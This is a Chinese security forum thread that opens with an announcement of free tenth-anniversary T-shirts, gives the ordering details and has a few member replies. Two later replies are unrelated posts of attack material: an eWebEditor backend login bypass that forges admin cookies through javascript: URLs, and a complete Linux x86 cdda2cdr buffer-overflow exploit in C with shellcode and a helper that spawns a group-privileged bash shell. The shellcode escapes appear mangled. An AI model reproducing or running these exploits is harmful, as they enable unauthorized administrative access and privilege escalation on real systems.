最近看过此主题的会员

返回列表 发帖

非安全十周年文化衫免费发布噢!

本帖最后由 legend 于 2016-8-4 17:14 编辑

T恤颜色及数量

十周年分黑白款男女款和经典五周年庆纪念款共两百件

特别说明:大码照顾体量大的朋友,90KG也能穿

另外:由于成本问题,凡参与者需要自付邮费,以邮件到付进行手续,你可以选择不参与,但是最终解释权归非安全中国所有!^_^

非安全中国网论坛或者QQ群成员具有优先申请权

每人限领一件!

体型参考:男 均码 180CM 身材亦可穿

女 均码 165CM 身材亦可穿

参加条件:将相关信息发送邮箱 [legend#sitedirsec.com](自行修改邮箱格式)

特别说明:根据录入先后顺序发货,数量有限。不一定每个人都有的噢!


=======邮件格式========

姓名周年款型号/颜色电话地址

1

评分人数

    • webmaster: 我很赞同威望 + 10 金钱 + 10 金 贡献 + 5 非安全基金 + 10 基金
非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:legend发表,本帖发表者legend符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者legend和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

邮件发给谁

TOP

回复 2# achitaka


   上面不是写很清楚么?

TOP

TOP

让大家期待已久的T恤,,,马上就可以领了。

    不想说了,赶快上车吧。

TOP

滴 父亲卡

TOP

ewebeditor php&asp版本后台认证漏洞
发布时间:2009-12-12
影响版本:php v3.8/asp v2.8
漏洞描述:eWebEditor是一个所见即所得的在线编辑器。顾名思义,就是能在网络上使用所见即所得的编辑方式进行编辑图文并茂的文章、新闻、讨论贴、通告、记事等多种文字处理应用。
../ewebeditor/admin/config.php文件
用户认证方式存在严重的安全漏洞,可以直接跳过认证获取到管理员权限。
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了.
这时候你清空浏览器的url,然后输入
javascript:alert(document.cookie="adminuser="+escape("admin"));
javascript:alert(document.cookie="adminpass="+escape("admin"));
javascript:alert(document.cookie="admindj="+escape("1"));
后三次回车,清空浏览器的 url,大家注意了,这次输入的url要注意,我们这次要输入的文件都是在正常情况下经过验证才能浏览的文件如../ewebeditor/admin /default.php
哈哈,直接进去了,利用和asp一样,新增样式修改上传,就ok了




















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Linux x86 cdda2cdr local disk exploit
cat > /tmp/cdda2x.c <<EOF
/**
** Linux x86 cdda2cdr local disk exploit
** gcc -o inj3ct0r inj3ct0r.c inj3ct0r <offset> <bufsiz>
**/
#include <stdlib.h>
#include <stdio.h>
char exec[]= /* Generic Linux x86 running our /tmp program */
  "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
  "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
  "x80xe8xdcxffxffxff/tmp/cd";
#define LEN 500
#define NOP 0x90
unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}
void main(int argc, char *argv[]) {
int offset=0;
int i;
int buflen = LEN;
long int addr;
char buf[LEN];
if(argc > 3) {
  fprintf(stderr, "Error: Usage: %s offset buffer
", argv[0]);
exit(0);
}
else if (argc == 2){
   offset=atoi(argv[1]);
}
else if (argc == 3) {
   offset=atoi(argv[1]);
   buflen=atoi(argv[2]);
}
else {
   offset=500;
   buflen=500;
}
addr=get_sp();
fprintf(stderr, "Linux x86 cdda2cdr local disk exploit
");
fprintf(stderr, "Using addr: 0x%x
", addr+offset);
memset(buf,NOP,buflen);
memcpy(buf+(buflen/2),exec,strlen(exec));
for(i=((buflen/2) + strlen(exec))+1;i<buflen-4;i+=4)
*(int *)&amp;buf=addr+offset;
execl("/usr/bin/cdda2cdr", "cdda2cdr", "-D", buf, NULL);
/*
for (i=0; i < strlen(buf); i++) putchar(buf);
*/
}
EOF
cat > /tmp/cd.c <<EOF
void main() {
    setregid(getegid(), getegid());
    system("/bin/bash");
}
EOF
gcc -o /tmp/cd /tmp/cd.c
gcc -o /tmp/cdda2x /tmp/cdda2x.c
echo "Note that gid=6 leads to easy root access.."
/tmp/cdda2x


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表